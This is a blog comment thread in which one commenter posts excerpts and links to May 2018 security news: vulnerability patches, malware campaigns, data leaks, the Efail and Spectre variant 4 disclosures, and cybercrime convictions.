https://www.securityweek.com/us-jury-convicts-operator-counter-av-service-scan4you
A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.
Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.
Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.
Tomi Engdahl says:
Critical Code Execution Flaws Patched in Advantech WebAccess
https://www.securityweek.com/critical-code-execution-flaws-patched-advantech-webaccess
Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.
Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.
Tomi Engdahl says:
Auth0 Secures $55 Million in New Funding Round
https://www.securityweek.com/auth0-secures-55-million-new-funding-round
Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.
Tomi Engdahl says:
Critical Command Injection Flaw Patched in Red Hat Linux
https://www.securityweek.com/critical-command-injection-flaw-patched-red-hat-linux
A critical vulnerability in the DHCP client in Red Hat Enterprise Linux could allow an attacker to execute arbitrary commands on impacted systems.
Tracked as CVE-2018-1111, the security flaw was reported by Felix Wilhelm from Google’s Security Team. The bug was discovered in the NetworkManager integration script included in the DHCP client packages.
The vulnerability features a CVSS3 Base Score of 7.5 and can be exploited without special privileges. However, an attacker targeting the bug could execute arbitrary commands with root privileges on vulnerable Red Hat systems.
The DHCP client package in Red Hat includes a script for the NetworkManager component. The script is executed each time NetworkManager receives a DHCP response from a DHCP server. Thus, a malicious DHCP response could be used to cause the script to execute arbitrary shell commands.
“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol,” Red Hat explains.
https://access.redhat.com/security/cve/cve-2018-1111
Tomi Engdahl says:
NHS cyber-hero ‘discussed bank hack role’
http://www.bbc.com/news/technology-44139467
The British cyber-security expert credited with thwarting a major ransomware attack is attempting to prevent a phone call transcript being used against him in the US courts.
The document quotes Marcus Hutchins as saying that he wrote code for an unidentified third-party, who then used it to make bank-hacking software.
Mr Hutchins has been accused of creating and distributing the password-stealing malware Kronos.
He has denied the charges.
The Ilfracombe, Devon-based researcher rose to prominence a year ago when he halted the Wannacry ransomware attack
“So, I wrote code for a guy a while back who then incorporated it into a banking malware,” Mr Hutchins is quoted as saying during the phone call after his arrest.
Tomi Engdahl says:
Zack Whittaker / ZDNet:
A bug in the website of LocationSmart, which sells real-time phone location data, let anyone track people’s locations across North America without consent — The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time. — A company that collects the real …
Cell phone tracking firm exposed millions of Americans’ real-time locations
https://www.zdnet.com/article/cell-phone-tracking-firm-exposed-millions-of-americans-real-time-locations/
The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time.
A company that collects the real-time location data on millions of cell phone customers across North America had a bug in its website that allowed anyone to see where a person is located — without obtaining their consent.
Earlier this week, we reported that four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.
The company, LocationSmart, is a data aggregator and claims to have “direct connections” to cell carriers to obtain locations from nearby cell towers. The site had its own “try-before-you-buy” page that lets you test the accuracy of its data. The page required explicit consent from the user before their location data can be used by sending a one-time text message to the user. When we tried with a colleague, we tracked his phone to a city block of his actual location.
But that website had a bug that allowed anyone to track someone’s location silently without their permission.
Tomi Engdahl says:
US cell carriers are selling access to your real-time phone location data
https://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/
The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.
Tomi Engdahl says:
One in four APAC firms not sure if they suffered security breach
https://www.zdnet.com/article/one-in-four-apac-firms-not-sure-if-they-suffered-security-breach/
A quarter of Asia-Pacific companies have experienced a security incident, while 27 percent aren’t even sure because they haven’t conducted any data breach assessment–even as the region is estimated to have lost US$1.75 trillion last year due to cyberattacks.
Tomi Engdahl says:
Mirai botnet adds three new attacks to target IoT devices
https://www.zdnet.com/article/mirai-botnet-adds-three-new-attacks-to-target-iot-devices/
This new version of the botnet uses exploits instead of brute force attacks to gain control of unpatched devices.
Tomi Engdahl says:
Lily Hay Newman / Wired:
Operator of malware-testing service Scan4You, which helped hackers evade antivirus software, convicted by US jury after Trend Micro gave data to the FBI — MOST ANTIVIRUS SCANNERS play a classic cat and mouse game: They work by checking software against a frequently updated list of potential threats.
https://www.wired.com/story/inside-scan4you-takedown
Tomi Engdahl says:
Music Business Worldwide:
After reports that Tidal is inflating streaming numbers for big stars and is late paying royalties, company hires cybersecurity firm to investigate breach
TIDAL investigates ‘potential data breach’ following fake streams accusation
https://www.musicbusinessworldwide.com/tidal-investigates-potential-data-breach-following-accusations-of-fake-streams/
Under-fire streaming platform TIDAL has announced that it has enlisted an “independent, third party cyber-security firm” to investigate a potential data breach at the company.
Its reason for doing so, however, is slightly confusing: the platform strongly denies claims recently made by Norwegian financial newspaper Dagens Næringsliv, which suggest that the accounts of TIDAL subscribers were manipulated in 2016 to falsely bulk up streaming numbers allocated to Kanye West’s The Life Of Pablo and Beyoncé’s Lemonade.
Tomi Engdahl says:
Cyrus Farivar / Ars Technica:
Alleged owners of Mugshots.com, a site that publishes mugshots and demands payment for removal, arrested on extortion, money laundering, identity theft charges
All of Mugshots.com’s alleged co-owners arrested on extortion charges
https://arstechnica.com/tech-policy/2018/05/all-of-mugshots-coms-alleged-co-owners-arrested-on-extortion-charges/
Mugshots.com is a “business permeated with fraud,” California AG says.
Tomi Engdahl says:
Dan Goodin / Ars Technica:
McAfee report: North Korea-linked hackers posted three apps on Google Play to steal personal info from defectors; hackers made contact with targets via Facebook
North Korea-tied hackers used Google Play and Facebook to infect defectors
Apps hosted in Google market for two months were spread over Facebook.
https://arstechnica.com/information-technology/2018/05/north-korea-tied-hackers-use-google-play-and-facebook-to-infect-defectors/
Researchers said a team of hackers tied to North Korea recently managed to get the Google Play market to host at least three Android apps designed to surreptitiously steal personal information from defectors of the isolated nation.
The three apps first appeared in the official Android marketplace in January and weren’t removed until March when Google was privately notified. That’s according to a blog post published Thursday by researchers from security company McAfee. Two apps masqueraded as security apps, and a third purported to provide information about food ingredients. Hidden functions caused them to steal device information and allow them to receive additional executable code that stole personal photos, contact lists, and text messages.
The apps were spread to selected individuals, in many cases by contacting them over Facebook. The apps had about 100 downloads when Google removed them.
https://securingtomorrow.mcafee.com/mcafee-labs/malware-on-google-play-targets-north-korean-defectors/
Tomi Engdahl says:
Patrick Winn / GlobalPost Investigations:
Interviews with experts and defectors detail North Korea’s Reconnaissance General Bureau, whose hackers are estimated to have stolen $650M+ — The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews.
How North Korean hackers became the world’s greatest bank robbers
https://gpinvestigations.pri.org/how-north-korean-hackers-became-the-worlds-greatest-bank-robbers-492a323732a6
The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews. In just the past few years, RGB hackers have struck more than 100 banks and cryptocurrency exchanges around the world, pilfering more than $650 million. That we know of.
Tomi Engdahl says:
Chance Miller / 9to5Mac:
Apple is telling developers to remove CallKit from apps listed in App Store in China after government request, likely because of CallKit’s VoIP functionalities — Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps …
Apple cracking down on CallKit apps in China App Store due to government regulation
https://9to5mac.com/2018/05/19/apple-cracking-down-on-callkit-apps-in-china-app-store-due-to-government-regulation/
Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps, the company is now removing applications that use the CallKit framework. The move comes in response to newly enforced regulation from the Chinese Ministry of Industry and Information Technology, according to a message obtained by 9to5Mac…
Tomi Engdahl says:
UK to introduce internet safety laws within ‘next couple of years’
Social networks may be on the hook for exposing kids to online bullying.
https://www.engadget.com/2018/05/20/uk-plans-internet-safety-laws/
Tomi Engdahl says:
T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account
https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/
T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.
Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked.
So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or or an automated call that reads the one-time code aloud.
A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.
However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.
Tomi Engdahl says:
Malicious Powershell Targeting UK Bank Customers
https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/
Tomi Engdahl says:
Chrome to Issue Red “Not Secure” Warning for HTTP
https://www.securityweek.com/chrome-issue-red-not-secure-warning-http
Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.
The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.
Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.
Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.
At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.
“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.
Tomi Engdahl says:
Hacked Drupal Sites Deliver Miners, RATs, Scams
https://www.securityweek.com/hacked-drupal-sites-deliver-miners-rats-scams
The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.
Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.
Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.
CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.
Tomi Engdahl says:
Two Vulnerabilities Patched in BIND DNS Software
https://www.securityweek.com/two-vulnerabilities-patched-bind-dns-software
Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.
While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.
One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.
The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.
Tomi Engdahl says:
Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
https://www.securityweek.com/man-sentenced-15-years-prison-ddos-attacks-firearm-charges
A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.
John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.
Tomi Engdahl says:
More Charges Against ‘Syrian Electronic Army’ Hackers
https://www.securityweek.com/more-charges-against-syrian-electronic-army-hackers
The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.
Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.
Tomi Engdahl says:
“Wicked” Variant of Mirai Botnet Emerges
https://www.securityweek.com/wicked-variant-mirai-botnet-emerges
A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributing a new bot, Fortinet researchers warn.
Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.
The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.
Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.
Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.
A Wicked Family of Bots
https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html
Tomi Engdahl says:
Phishing Roundup: Caracal, Stealth Mango, Tangelo, Apple, DHL, eFax & More
https://www.bleepingcomputer.com/news/security/phishing-roundup-caracal-stealth-mango-tangelo-apple-dhl-efax-and-more/
Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim’s computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.
Tomi Engdahl says:
Business Email Compromise incidents
https://isc.sans.edu/forums/diary/Business+Email+Compromise+incidents/23669/
Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business emails. Often O365, but also some Gmail and on premise systems with webmail access.
The objective is simple, use the system to convince the organisation, or a customer of the organisation to pay a fake invoice and transfer the money overseas. The average net of these breaches is around $85,000, but there have been cases well into the 7 figures. So quite worthwhile for the attacker. Most organisations are not set up to prevent or detect this kind of attack until it is too late.
Whilst similar to whaling emails the approach is more thought out and structured. The attacks are typically targeted. There are two scenarios we usually see:
Compromise victim company, identify invoices to be paid by the victim, spoof the company to be paid and convince the victim to pay to an incorrect account.
Compromise victim company, identify customer invoices to be paid to the victim, Spoof the victim and convince customers to pay invoices into an incorrect account.
There are a few opportunities to detect or prevent these kinds of attacks:
Prevent
Have a robust payment changing process – validate using details you have in your database and call them regardless of whether someone called you
Don’t pay to overseas accounts – especially when previous invoices were payed within the country.
Check previous payments – Where did they go, is this different, if so halt the payment.
Disallow forwarding rules to external addresses – This won’t stop it, but does make it more difficult
Multi Factor Authentication (MFA) on mail
Detect
Logins from locations other than your office
Logins where the IP address changes – we see many use open proxies when logging into a victim account. In logs that looks like the person travels rapidly across the globe.
Regularly interrogate rules created in the email product – this is often how we find the other compromised accounts.
Tomi Engdahl says:
Anatomy of a Redis mining worm
https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/
Public accessible Redis servers are being exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days, we’ve seen 173 unique IP addresses that have been infected with this worm, whereof 88% of the infected servers are located in China, 4% in the US and 4% Hongkong.
The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and finally looks for new targets. It will send the payload “*1\r\n$4\r\nINFO\r\n” and check the response for the string “os:Linux”, to prevent replication to other operating systems.
When the cron job executes, the worm will disable security, close the existing publicly open Redis port using iptables, disable SELinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case, transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, that’s assumed to be the reason that a copy will be made on each replication.
Tomi Engdahl says:
Was the Efail disclosure horribly screwed up?
https://blog.cryptographyengineering.com/2018/05/17/was-the-efail-disclosure-horribly-screwed-up/
On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction.
By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker controlled-server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.
The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world.
Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients.
How Efail was disclosed to the PGP community
Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us.
Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding.
All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.
There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal.
A unified timeline of Efail PGP disclosure events
http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html
Tomi Engdahl says:
Insecure Claymore Miner Management API Exploited in the Wild
https://isc.sans.edu/forums/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/
We have seen a notable increase in scans for port 3333/tcp in the wild. Port 3333 is used by a variety of crypto coin miners and mining pools.
Tomi Engdahl says:
200 Million Sets of Japanese PII Emerge on Underground Forums
https://www.securityweek.com/200-million-sets-japanese-pii-emerge-underground-forums
A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.
Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.
The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.
Tomi Engdahl says:
Misconfigured CalAmp Server Enabled Vehicle Takeover
https://www.securityweek.com/misconfigured-calamp-server-enabled-vehicle-takeover
A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.
The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.
The researchers discovered that the application uses a SSL connection and uses SSL pinning to prevent tampering.
Tomi Engdahl says:
DHS Publishes New Cybersecurity Strategy
https://www.securityweek.com/dhs-publishes-new-cybersecurity-strategy
The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.
The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide “the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient.”
https://www.dhs.gov/sites/default/files/publications/DHS-Cybersecurity-Strategy_1.pdf
Tomi Engdahl says:
Tara Francis Chan / Business Insider:
Chinese state-run media says the country’s social credit system has blocked people from taking over 11M flights and 4M train trips; full rollout coming by 2020
http://www.businessinsider.com/china-social-credit-system-blocked-people-taking-flights-train-trips-2018-5?op=1
Tomi Engdahl says:
Zack Whittaker / ZDNet:
TeenSafe, an app for parents to monitor kids’ phone use, stored some app login passwords and kids’ Apple ID credentials in plaintext on an unsecured AWS server
Teen phone monitoring app leaked thousands of user passwords
https://www.zdnet.com/article/teen-phone-monitoring-app-leaks-thousands-of-users-data/
Exclusive: A server stored teenagers’ Apple ID email addresses and plaintext passwords.
At least one server used by an app for parents to monitor their teenagers’ phone activity has leaked tens of thousands of accounts of both parents and children.
The mobile app, TeenSafe, bills itself as a “secure” monitoring app for iOS and Android, which lets parents view their child’s text messages and location, monitor who they’re calling and when, access their web browsing history, and find out which apps they have installed.
Although teen monitoring apps are controversial and privacy-invasive, the company says it doesn’t require parents to obtain the consent of their children.
Robert Wiggins, a UK-based security researcher who searches for public and exposed data, found two leaky servers.
Both of the servers was pulled offline after ZDNet alerted the company,
“We have taken action to close one of our servers to the public and begun alerting customers that could potentially be impacted,” said a TeenSafe spokesperson told ZDNet on Sunday.
The database stores the parent’s email address associated with TeenSafe, as well as their corresponding child’s Apple ID email address. It also includes the child’s device name — which is often just their name — and their device’s unique identifier.
there were at least 10,200 records from the past three months containing customers data
TeenSafe claims to have over a million parents using the service.
We contacted a dozen people over iMessage, one by one, to confirm their passwords
It’s not clear why the data, let alone passwords for teens’ Apple IDs, was stored in plaintext.
The company claims on its website that it’s “secure” and uses encryption
How not to verify a data breach (and why some really want you to get ‘pwned’)
Whatever you do, don’t break the law…
https://www.zdnet.com/article/how-not-to-verify-a-data-breach/
Just as hackers want verification for credibility or acclaim, some breach sites want news coverage to sell something. The hacked companies want to know so they can disaster-manage (companies get hacked because their security is bad, not because the hackers are always that good), and news outlets want the exclusive.
But also — verification is important for the victims. The sooner victims know about data breaches, the sooner they can protect themselves.
Make no mistake, verifying data isn’t an easy process. It’s time consuming, laborious, and not always fruitful.
Logging into someone else’s account without permission is illegal in the US.
Besides, that still wouldn’t be enough to verify a breach
When reporters verify breaches, they walk a line to ensure they’re not intrusive or inconveniencing people. One of the easiest ways to begin verifying a breach is by enumerating disposable Mailinator email accounts through a website’s password reset field. Reporters also have to examine the data
This boom in hack reporting has in part led to a cycle of more awareness and coverage, which has led to more data breach monitoring and notification sites popping up
Tomi Engdahl says:
Microsoft, Google: We’ve found a fourth data-leaking Meltdown-Spectre CPU hole
Design blunder exists in Intel, AMD, Arm, Power processors
https://www.theregister.co.uk/2018/05/21/spectre_meltdown_v4_microsoft_google/
A fourth variant of the data-leaking Meltdown-Spectre security flaws in modern processors has been found by Microsoft and Google researchers.
These speculative-execution design blunders can be potentially exploited by malicious software running on a vulnerable device or computer
Variants 1 and 2 are known as Spectre (CVE-2017-5753, CVE-2017-5715), and variant 3 is Meltdown (CVE-2017-5754). Today, variant 4 (CVE-2018-3639) was disclosed by Microsoft and Google researchers.
It affects modern out-of-order execution processor cores from Intel, AMD, and Arm, as well as IBM’s Power 8, Power 9, and System z CPUs. Bear in mind, Arm cores are used the world over in smartphones, tablets, and embedded electronics.
The fourth variant can be potentially exploited by script files running within a program – such as JavaScript on a webpage in a browser tab
According to Intel, mitigations already released to the public for variant 1, which is the hardest vulnerability to tackle, should make attacks leveraging variant 4 much more difficult.
So far, no known exploit code is circulating in the wild targeting the fourth variant.
Another bug, CVE-2018-3640, was also disclosed: this is a rogue system register read, allowing normal programs to peek at hardware status flags and the like in registers that should only really be accessible by the operating system kernel, drivers, and hypervisors.
Variant 4 is referred to as a speculative store bypass. It is yet another “wait, why didn’t I think of that?” design oversight in modern out-of-order-execution engineering.
The name Spectre was chosen deliberately: it is like observing a ghost in the machine. Private data can be discerned by watching the cache being updated by the processor’s speculative execution engine. This speculation is crucial to running chips as fast as possible
Intel, Arm, et al response
“Variant 4 uses speculative execution, a feature common to most modern processor architectures, to potentially expose certain kinds of data through a side channel,” said Leslie Culbertson, Intel’s executive veep of product security.
“Starting in January, most leading browser providers deployed mitigations for Variant 1 in their managed runtimes – mitigations that substantially increase the difficulty of exploiting side channels in a web browser. These mitigations are also applicable to Variant 4 and available for consumers to use today.”
According to Culbertson, Intel and others will issue new microcode and software tweaks to more fully counter malware exploiting the fourth variant.
“We’ve already delivered the microcode update for Variant 4 in beta form to OEM system manufacturers and system software vendors, and we expect it will be released into production BIOS and software updates over the coming weeks.
“This mitigation will be set to off-by-default, providing customers the choice of whether to enable it or not. We expect most industry software partners will likewise use the default-off option.
If enabled, we’ve observed a performance impact of approximately 2-8 per cent
Arm will make available to system-on-chip designers updated blueprints for Cortex-A72, Cortex-A73, and Cortex-A75 cores that are resistant to Spectre variant 2, and the Cortex-A75 will be updated to resist Meltdown, aka variant 3.
Red Hat today published a substantial guide to the fourth variant, its impact, and how it works. VMware also has an advisory and updates, here,
We note that, so far, no malware has been seen attacking any of the Spectre and Meltdown holes in today’s chips, let alone this latest variant
Speculative Store Buffer Bypass in 3 minutes
https://www.youtube.com/watch?v=Uv6lDgcUAC0
Speculative Store Buffer Bypass is a security vulnerability that allows unauthorized users to steal sensitive information through websites. Similar to the Spectre and Meltdown threats in early 2018, it exploits speculative execution–a process most computers use to speed up routine tasks
Tomi Engdahl says:
FireEye Launches OAuth Attack Testing Platform
https://www.securityweek.com/fireeye-launches-oauth-attack-testing-platform
FireEye on Monday announced the availability of a platform to allow organizations and pentesters check their ability to detect and respond to OAuth abuse attacks.
OAuth 2.0 is a protocol employed by major Internet companies, including Amazon, Google, Facebook, and Microsoft, to facilitate granting third-party applications access to user data. Using social engineering, attackers can trick victims into authorizing a third-party application to access their account, thus gaining access to all of the user’s data without the need for credentials.
“In releasing the tool, we hope to increase awareness about this threat, improve the security community’s ability to detect it, and provide countermeasures for defenders,” FireEye’s Doug Bienstock explains.
In an OAuth authorization flow, the third-party application requests a specific type of access to a user’s account, and APIs are used to define such sets of scopes (similar to the permissions apps ask for on mobile devices).
An attacker looking to abuse OAuth can create a malicious application and then retrieve user data with the help of obtained access tokens, via the API Resource. Access tokens don’t require a password and can bypass any two-factor enforcement in place, and access to the OAuth application has to be explicitly revoked to prevent abuse.
Shining a Light on OAuth Abuse with PwnAuth
https://www.fireeye.com/blog/threat-research/2018/05/shining-a-light-on-oauth-abuse-with-pwnauth.html
Tomi Engdahl says:
Germany calls on chip and hardware makers to tackle processor flaws
https://www.reuters.com/article/us-cyber-germany/germany-calls-on-chip-and-hardware-makers-to-tackle-processor-flaws-idUSKCN1IJ2H3
Germany’s federal cyber agency called on chip and hardware-makers to address new vulnerabilities discovered in computer central processing units, but said no complete fix was possible at the moment.
The BSI agency said its analysis showed the new flaws, dubbed Spectre-Next Generation, resembled the Meltdown and Spectre bugs discovered in January and could allow attackers to access personal data such as passwords and encryption keys.
While no new attacks were known outside laboratories, there was a risk that attackers could develop new methods based on detailed information that had been disclosed, it added.
Tomi Engdahl says:
Explaining Efail and Why It Isn’t the End of Email Privacy
https://hackaday.com/2018/05/21/explaining-efail-and-why-it-isnt-the-end-of-email-privacy/
Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.
A team of researchers published a paper(PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.
But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients., but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption all together just makes no sense.
Aside from the massive false alarm, Efail is a very interesting exploi
Efail Does Not Directly Exploit PGP
In a nutshell, if an attacker is able to get access to a user’s encrypted email, they can modify the message in a specific way and send it back to the user. The user’s email client will the decrypt the message and (if the email client is rendering HTML tags) automatically send the decrypted message back to the attacker.
The encryption itself it is not broken in any way. It’s how the messages are processed by the user’s email client that introduces the vulnerability. Saying PGP is broken is just plain wrong
Efail Builds On the Concepts of Tracking Pixels
Efail uses this kind of remote loading of images as the backchannel to exfiltrate the decrypted email. Other methods should also be possible. Efail takes advantage of the email client first has to decrypt an encrypted message in order to show it and then it renders the HTML code in the message.
Malleability Gadgets
We’ve seen how simple it is to implement a direct exfiltration channel in order to decrypt email. In some email clients, that technique does not work, so the Efail paper describes a more generic way to introduce the exfiltration channel inside the actually encrypted data itself.
Conclusion
My hopes is that the reader realizes two things: that the encryption of emails is still generically safe and that rendering HTML in emails is still not a good idea.
